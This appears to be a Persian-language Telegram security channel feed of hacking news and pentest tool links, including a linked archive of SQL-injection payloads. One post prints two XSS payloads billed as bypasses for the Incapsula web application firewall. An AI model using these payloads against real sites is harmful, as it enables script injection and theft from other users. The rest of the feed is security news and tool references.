امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
دور زدن محدودیت آپلود فایل با حقه Double Extension

https://infosecaddicts.com/file-upload-vulnerability/

#web
#pentest
#shell
این ریپوزیتوری لینوکس کالی شمارو به دستگاهی تبدیل میکنه که تمام ترافیک عبوری رو با وایرشارک ضبط کرده و ترافیک مرتبط به وب با پروتکل های HTTP و HTTPS رو برای بازرسی به پروکسی بازرسی کننده مانند BurpSuite که بر روی سیستم عامل دیگه ای در حال اجرا هست ارسال میکنه.

https://github.com/koenbuyens/kalirouter

#interception
#hijack
#network
#kali
#sniff
#wireshark
پست رییس سابق CIA و NSA در توییتر!
گویا پسوردی رو اشتباها توییت کرده!

#fun
دراپر تروجان بانکی با نام Bankbot توسط بعضی برنامه های موجود در گوگل پلی در گوشی کاربران نصب شده!

https://tinyurl.com/yaklfxdw

#android
#trojan
#google
ال جی کره مجددا مورد حمله سایبری قرار گرفت.
سرویس اینترنت و امنیت کره جنوبی گزارشی از شرکت ال جی مبنی بر حمله بدافزاری که شبیه به WannaCry بوده دریافت کرده.اما این موضوع کاملا تایید نشده است.
بعد از ایجاد تاخیر در برخی از سرویس های آنلاین این شرکت، کارشناسان این شرکت با کشف کدهای مخرب اقدام به خاموش کردن تعدادی از دستگاه های آلوده کردند.
هوشیاری کارشناسان باعث شده باج افزار موفق یه رمزنگاری داده ها نشه و جلوی حمله و ضرر رو به سرعت گرفتن.

#news
#lg
#wannacry
#ransomware
ابزار portia برای تست نفوذ شبکه های داخلی و بالا بردن سطح دسترسی بعد از تسخیر کاربری با سطح دسترسی پایین

https://github.com/SpiderLabs/portia

#pentest
#network
#privilege_escalate
کریم باراتف هکر روس که متهم شده به هک کردن سیستم های یاهو و سرقت اطلاعات ۵۰۰ میلیون کاربر ، در کانادا دستگیر و به امریکا تحویل داده شد.
در اولین اخبار منتشر شده کریم این هک رو تکذیب کرده.
SQL-Injection-Payloads-master.zip
8.2 KB
پیلود های SQLI برای استفاده در Burp Suite و OWASP Zed Attack Proxy
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.

https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator

#windows
#malware